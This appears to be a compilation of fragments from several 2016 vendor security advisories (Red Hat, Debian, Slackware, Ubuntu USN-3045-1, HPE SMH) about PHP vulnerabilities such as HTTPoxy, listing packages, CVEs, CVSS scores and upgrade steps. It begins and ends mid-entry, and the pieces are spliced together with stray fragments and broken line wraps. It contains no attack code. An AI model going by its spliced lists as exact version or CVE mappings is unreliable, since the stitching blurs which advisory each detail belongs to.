6.6):\n\nSource:\nphp54-php-5.4.40-4.el6.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el6.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el6.x86_64.rpm\nphp54-php-cli-5.4.40-4.el6.x86_64.rpm\nphp54-php-common-5.4.40-4.el6.x86_64.rpm\nphp54-php-dba-5.4.40-4.el6.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el6.x86_64.rpm\nphp54-php-devel-5.4.40-4.el6.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el6.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el6.x86_64.rpm\nphp54-php-gd-5.4.40-4.el6.x86_64.rpm\nphp54-php-imap-5.4.40-4.el6.x86_64.rpm\nphp54-php-intl-5.4.40-4.el6.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el6.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el6.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el6.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el6.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el6.x86_64.rpm\nphp54-php-process-5.4.40-4.el6.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el6.x86_64.rpm\nphp54-php-recode-5.4.40-4.el6.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el6.x86_64.rpm\nphp54-php-soap-5.4.40-4.el6.x86_64.rpm\nphp54-php-tidy-5.4.40-4.el6.x86_64.rpm\nphp54-php-xml-5.4.40-4.el6.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):\n\nSource:\nphp54-php-5.4.40-4.el6.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el6.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el6.x86_64.rpm\nphp54-php-cli-5.4.40-4.el6.x86_64.rpm\nphp54-php-common-5.4.40-4.el6.x86_64.rpm\nphp54-php-dba-5.4.40-4.el6.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el6.x86_64.rpm\nphp54-php-devel-5.4.40-4.el6.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el6.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el6.x86_64.rpm\nphp54-php-gd-5.4.40-4.el6.x86_64.rpm\nphp54-php-imap-5.4.40-4.el6.x86_64.rpm\nphp54-php-intl-5.4.40-4.el6.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el6.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el6.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el6.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el6.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el6.x86_64.rpm\nphp54-php-process-5.4.40-4.el6.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el6.x86_64.rpm\nphp54-php-recode-5.4.40-4.el6.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el6.x86_64.rpm\nphp54-php-soap-5.4.40-4.el6.x86_64.rpm\nphp54-php-tidy-5.4.40-4.el6.x86_64.rpm\nphp54-php-xml-5.4.40-4.el6.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nphp54-php-5.4.40-4.el6.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el6.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el6.x86_64.rpm\nphp54-php-cli-5.4.40-4.el6.x86_64.rpm\nphp54-php-common-5.4.40-4.el6.x86_64.rpm\nphp54-php-dba-5.4.40-4.el6.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el6.x86_64.rpm\nphp54-php-devel-5.4.40-4.el6.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el6.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el6.x86_64.rpm\nphp54-php-gd-5.4.40-4.el6.x86_64.rpm\nphp54-php-imap-5.4.40-4.el6.x86_64.rpm\nphp54-php-intl-5.4.40-4.el6.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el6.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el6.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el6.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el6.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el6.x86_64.rpm\nphp54-php-process-5.4.40-4.el6.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el6.x86_64.rpm\nphp54-php-recode-5.4.40-4.el6.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el6.x86_64.rpm\nphp54-php-soap-5.4.40-4.el6.x86_64.rpm\nphp54-php-tidy-5.4.40-4.el6.x86_64.rpm\nphp54-php-xml-5.4.40-4.el6.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nphp54-php-5.4.40-4.el7.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el7.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el7.x86_64.rpm\nphp54-php-cli-5.4.40-4.el7.x86_64.rpm\nphp54-php-common-5.4.40-4.el7.x86_64.rpm\nphp54-php-dba-5.4.40-4.el7.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el7.x86_64.rpm\nphp54-php-devel-5.4.40-4.el7.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el7.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el7.x86_64.rpm\nphp54-php-gd-5.4.40-4.el7.x86_64.rpm\nphp54-php-intl-5.4.40-4.el7.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el7.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el7.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el7.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el7.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el7.x86_64.rpm\nphp54-php-process-5.4.40-4.el7.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el7.x86_64.rpm\nphp54-php-recode-5.4.40-4.el7.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el7.x86_64.rpm\nphp54-php-soap-5.4.40-4.el7.x86_64.rpm\nphp54-php-xml-5.4.40-4.el7.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nphp54-php-5.4.40-4.el7.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el7.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el7.x86_64.rpm\nphp54-php-cli-5.4.40-4.el7.x86_64.rpm\nphp54-php-common-5.4.40-4.el7.x86_64.rpm\nphp54-php-dba-5.4.40-4.el7.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el7.x86_64.rpm\nphp54-php-devel-5.4.40-4.el7.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el7.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el7.x86_64.rpm\nphp54-php-gd-5.4.40-4.el7.x86_64.rpm\nphp54-php-intl-5.4.40-4.el7.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el7.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el7.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el7.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el7.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el7.x86_64.rpm\nphp54-php-process-5.4.40-4.el7.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el7.x86_64.rpm\nphp54-php-recode-5.4.40-4.el7.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el7.x86_64.rpm\nphp54-php-soap-5.4.40-4.el7.x86_64.rpm\nphp54-php-xml-5.4.40-4.el7.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.2):\n\nSource:\nphp54-php-5.4.40-4.el7.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el7.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el7.x86_64.rpm\nphp54-php-cli-5.4.40-4.el7.x86_64.rpm\nphp54-php-common-5.4.40-4.el7.x86_64.rpm\nphp54-php-dba-5.4.40-4.el7.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el7.x86_64.rpm\nphp54-php-devel-5.4.40-4.el7.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el7.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el7.x86_64.rpm\nphp54-php-gd-5.4.40-4.el7.x86_64.rpm\nphp54-php-intl-5.4.40-4.el7.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el7.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el7.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el7.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el7.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el7.x86_64.rpm\nphp54-php-process-5.4.40-4.el7.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el7.x86_64.rpm\nphp54-php-recode-5.4.40-4.el7.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el7.x86_64.rpm\nphp54-php-soap-5.4.40-4.el7.x86_64.rpm\nphp54-php-xml-5.4.40-4.el7.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp54-php-5.4.40-4.el7.src.rpm\n\nx86_64:\nphp54-php-5.4.40-4.el7.x86_64.rpm\nphp54-php-bcmath-5.4.40-4.el7.x86_64.rpm\nphp54-php-cli-5.4.40-4.el7.x86_64.rpm\nphp54-php-common-5.4.40-4.el7.x86_64.rpm\nphp54-php-dba-5.4.40-4.el7.x86_64.rpm\nphp54-php-debuginfo-5.4.40-4.el7.x86_64.rpm\nphp54-php-devel-5.4.40-4.el7.x86_64.rpm\nphp54-php-enchant-5.4.40-4.el7.x86_64.rpm\nphp54-php-fpm-5.4.40-4.el7.x86_64.rpm\nphp54-php-gd-5.4.40-4.el7.x86_64.rpm\nphp54-php-intl-5.4.40-4.el7.x86_64.rpm\nphp54-php-ldap-5.4.40-4.el7.x86_64.rpm\nphp54-php-mbstring-5.4.40-4.el7.x86_64.rpm\nphp54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm\nphp54-php-odbc-5.4.40-4.el7.x86_64.rpm\nphp54-php-pdo-5.4.40-4.el7.x86_64.rpm\nphp54-php-pgsql-5.4.40-4.el7.x86_64.rpm\nphp54-php-process-5.4.40-4.el7.x86_64.rpm\nphp54-php-pspell-5.4.40-4.el7.x86_64.rpm\nphp54-php-recode-5.4.40-4.el7.x86_64.rpm\nphp54-php-snmp-5.4.40-4.el7.x86_64.rpm\nphp54-php-soap-5.4.40-4.el7.x86_64.rpm\nphp54-php-xml-5.4.40-4.el7.x86_64.rpm\nphp54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXrPSRXlSAg2UNWIIRAm7eAJ46bwD5dNGjO2qoFKsoL92xftbbTgCgkeMg\n3r5SaIOUCU9fw1VuBLjTlPI=\n=fzN3\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.24, which includes additional bug fixes. Please refer to the\nupstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.6.24\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.24+dfsg-0+deb8u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.0.9-1 of the php7.0 source package. \n\nWe recommend that you upgrade your php5 packages. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/php-5.6.24-i586-1_slack14.2.txz: Upgraded. \n For more information, see:\n http://php.net/ChangeLog-5.php#5.6.24\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5385\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6207\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.24-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.24-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.24-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.24-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/php-5.6.24-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/php-5.6.24-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.24-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.24-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n712cc177c9ac10f3d58e871ff27260dc php-5.6.24-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n47f6ad4a81517f5b2959abc73475742b php-5.6.24-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\naea6a8869946186781e55c5ecec952b0 php-5.6.24-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nab16db742762605b9b219b37cdd7e8db php-5.6.24-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nc88a731667e741443712267d9b30286a php-5.6.24-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\ned5b31c94e2fb91f0e6c40051f51da1c php-5.6.24-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc25a85fece34101d35b8785022cef94d n/php-5.6.24-i586-1.txz\n\nSlackware x86_64 -current package:\n17f8886fc0901cea6d593170ea00fe7b n/php-5.6.24-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg php-5.6.24-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. 6) - i386, x86_64\n\n3. \n=========================================================================\nUbuntu Security Notice USN-3045-1\nAugust 02, 2016\n\nphp5, php7.0 vulnerabilities\n=========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in PHP. \n\nSoftware Description:\n- php7.0: HTML-embedded scripting language interpreter\n- php5: HTML-embedded scripting language interpreter\n\nDetails:\n\nIt was discovered that PHP incorrectly handled certain SplMinHeap::compar\ne\noperations. A remote attacker could use this issue to cause PHP to crash,\n\nresulting in a denial of service, or possibly execute arbitrary code. Thi\ns\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2015-4116\n)\n\nIt was discovered that PHP incorrectly handled recursive method calls. A\nremote attacker could use this issue to cause PHP to crash, resulting in \na\ndenial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu\n14.04 LTS. (CVE-2015-8873)\n\nIt was discovered that PHP incorrectly validated certain Exception object\ns\nwhen unserializing data. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0\n4\nLTS. (CVE-2015-8876)\n\nIt was discovered that PHP header() function performed insufficient\nfiltering for Internet Explorer. A remote attacker could possibly use thi\ns\nissue to perform a XSS attack. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. (CVE-2015-8935)\n\nIt was discovered that PHP incorrectly handled certain locale operations. \n\nAn attacker could use this issue to cause PHP to crash, resulting in a\ndenial of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu\n14.04 LTS. (CVE-2016-5093)\n\nIt was discovered that the PHP php_html_entities() function incorrectly\nhandled certain string lengths. A remote attacker could use this issue to\n\ncause PHP to crash, resulting in a denial of service, or possibly execute\n\narbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0\n4\nLTS. (CVE-2016-5094, CVE-2016-5095)\n\nIt was discovered that the PHP fread() function incorrectly handled certa\nin\nlengths. An attacker could use this issue to cause PHP to crash, resultin\ng\nin a denial of service, or possibly execute arbitrary code. This issue on\nly\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5096)\n\nIt was discovered that the PHP FastCGI Process Manager (FPM) SAPI\nincorrectly handled memory in the access logging feature. An attacker cou\nld\nuse this issue to cause PHP to crash, resulting in a denial of service, o\nr\npossibly expose sensitive information. This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5114)\n\nIt was discovered that PHP would not protect applications from contents o\nf\nthe HTTP_PROXY environment variable when based on the contents of the Pro\nxy\nheader from HTTP requests. A remote attacker could possibly use this issu\ne\nin combination with scripts that honour the HTTP_PROXY variable to redire\nct\noutgoing HTTP requests. (CVE-2016-5385)\n\nHans Jerry Illikainen discovered that the PHP bzread() function incorrect\nly\nperformed error handling. A remote attacker could use this issue to cause\n\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2016-5399)\n\nIt was discovered that certain PHP multibyte string functions incorrectly\n\nhandled memory. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-5768)\n\nIt was discovered that the PHP Mcrypt extension incorrectly handled memor\ny. \nA remote attacker could use this issue to cause PHP to crash, resulting i\nn\na denial of service, or possibly execute arbitrary code. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-5769)\n\nIt was discovered that the PHP garbage collector incorrectly handled\ncertain objects when unserializing malicious data. A remote attacker coul\nd\nuse this issue to cause PHP to crash, resulting in a denial of service, o\nr\npossibly execute arbitrary code. This issue was only addressed in Ubuntu\nUbuntu 14.04 LTS. (CVE-2016-5771, CVE-2016-5773)\n\nIt was discovered that PHP incorrectly handled memory when unserializing\nmalicious xml data. A remote attacker could use this issue to cause PHP t\no\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2016-5772)\n\nIt was discovered that the PHP php_url_parse_ex() function incorrectly\nhandled string termination. A remote attacker could use this issue to cau\nse\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.0\n4\nLTS. (CVE-2016-6288)\n\nIt was discovered that PHP incorrectly handled path lengths when extracti\nng\ncertain Zip archives. A remote attacker could use this issue to cause PHP\n\nto crash, resulting in a denial of service, or possibly execute arbitrary\n\ncode. (CVE-2016-6289)\n\nIt was discovered that PHP incorrectly handled session deserialization. A\n\nremote attacker could use this issue to cause PHP to crash, resulting in \na\ndenial of service, or possibly execute arbitrary code. (CVE-2016-6290)\n\nIt was discovered that PHP incorrectly handled exif headers when processi\nng\ncertain JPEG images. A remote attacker could use this issue to cause PHP \nto\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2016-6291, CVE-2016-6292)\n\nIt was discovered that PHP incorrectly handled certain locale operations. \n A\nremote attacker could use this issue to cause PHP to crash, resulting in \na\ndenial of service, or possibly execute arbitrary code. (CVE-2016-6294)\n\nIt was discovered that the PHP garbage collector incorrectly handled\ncertain objects when unserializing SNMP data. A remote attacker could use\n\nthis issue to cause PHP to crash, resulting in a denial of service, or\npossibly execute arbitrary code. This issue only affected Ubuntu 14.04 LT\nS\nand Ubuntu 16.04 LTS. (CVE-2016-6295)\n\nIt was discovered that the PHP xmlrpc_encode_request() function incorrect\nly\nhandled certain lengths. An attacker could use this issue to cause PHP to\n\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2016-6296)\n\nIt was discovered that the PHP php_stream_zip_opener() function incorrect\nly\nhandled memory. An attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2016-6297)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libapache2-mod-php7.0 7.0.8-0ubuntu0.16.04.2\n php7.0-cgi 7.0.8-0ubuntu0.16.04.2\n php7.0-cli 7.0.8-0ubuntu0.16.04.2\n php7.0-fpm 7.0.8-0ubuntu0.16.04.2\n\nUbuntu 14.04 LTS:\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.19\n php5-cgi 5.5.9+dfsg-1ubuntu4.19\n php5-cli 5.5.9+dfsg-1ubuntu4.19\n php5-fpm 5.5.9+dfsg-1ubuntu4.19\n\nUbuntu 12.04 LTS:\n libapache2-mod-php5 5.3.10-1ubuntu3.24\n php5-cgi 5.3.10-1ubuntu3.24\n php5-cli 5.3.10-1ubuntu3.24\n php5-fpm 5.3.10-1ubuntu3.24\n\nIn general, a standard system update will make all the necessary changes. \n\n\nReferences:\n http://www.ubuntu.com/usn/usn-3045-1\n CVE-2015-4116, CVE-2015-8873, CVE-2015-8876, CVE-2015-8935,\n CVE-2016-5093, CVE-2016-5094, CVE-2016-5095, CVE-2016-5096,\n CVE-2016-5114, CVE-2016-5385, CVE-2016-5399, CVE-2016-5768,\n CVE-2016-5769, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773,\n CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291,\n CVE-2016-6292, CVE-2016-6294, CVE-2016-6295, CVE-2016-6296,\n CVE-2016-6297\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/php7.0/7.0.8-0ubuntu0.16.04.2\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.19\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.24\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05320149\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05320149\nVersion: 1\n\nHPSBMU03653 rev.1 - HPE System Management Homepage (SMH), Remote Arbitrary\nCode Execution, Cross-Site Scripting (XSS), Denial of Service (DoS),\nUnauthorized Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-10-26\nLast Updated: 2016-10-26\n\nPotential Security Impact: Remote: Arbitrary Code Execution, Cross-Site\nScripting (XSS), Denial of Service (DoS), Unauthorized Disclosure of\nInformation\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nMultiple potential security vulnerabilities have been identified in HPE\nSystem Management Homepage (SMH) on Windows and Linux. \n\nReferences:\n\n - CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information\n - CVE-2016-2106 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2109 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2105 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-3739 - cURL and libcurl, Remote code execution\n - CVE-2016-5388 - \"HTTPoxy\", Apache Tomcat\n - CVE-2016-5387 - \"HTTPoxy\", Apache HTTP Server\n - CVE-2016-5385 - \"HTTPoxy\", PHP \n - CVE-2016-4543 - PHP, multiple impact\n - CVE-2016-4071 - PHP, multiple impact\n - CVE-2016-4072 - PHP, multiple impact\n - CVE-2016-4542 - PHP, multiple impact\n - CVE-2016-4541 - PHP, multiple impact\n - CVE-2016-4540 - PHP, multiple impact\n - CVE-2016-4539 - PHP, multiple impact\n - CVE-2016-4538 - PHP, multiple impact\n - CVE-2016-4537 - PHP, multiple impact\n - CVE-2016-4343 - PHP, multiple impact\n - CVE-2016-4342 - PHP, multiple impact\n - CVE-2016-4070 - PHP, Denial of Service (DoS)\n - CVE-2016-4393 - PSRT110263, XSS vulnerability\n - CVE-2016-4394 - PSRT110263, HSTS vulnerability\n - CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow\n - CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow\n - PSRT110145\n - PSRT110263\n - PSRT110115\n - PSRT110116\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HPE System Management Homepage - all versions prior to v7.6\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 5.9 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-3739\n 5.3 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N\n 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\n\n CVE-2016-4070\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-4071\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4072\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4342\n 8.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n 8.3 (AV:N/AC:M/Au:N/C:P/I:P/A:C)\n\n CVE-2016-4343\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4393\n 4.2 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\n 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)\n\n CVE-2016-4394\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)\n\n CVE-2016-4395\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)\n\n CVE-2016-4396\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)\n\n CVE-2016-4537\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4538\n 9.8 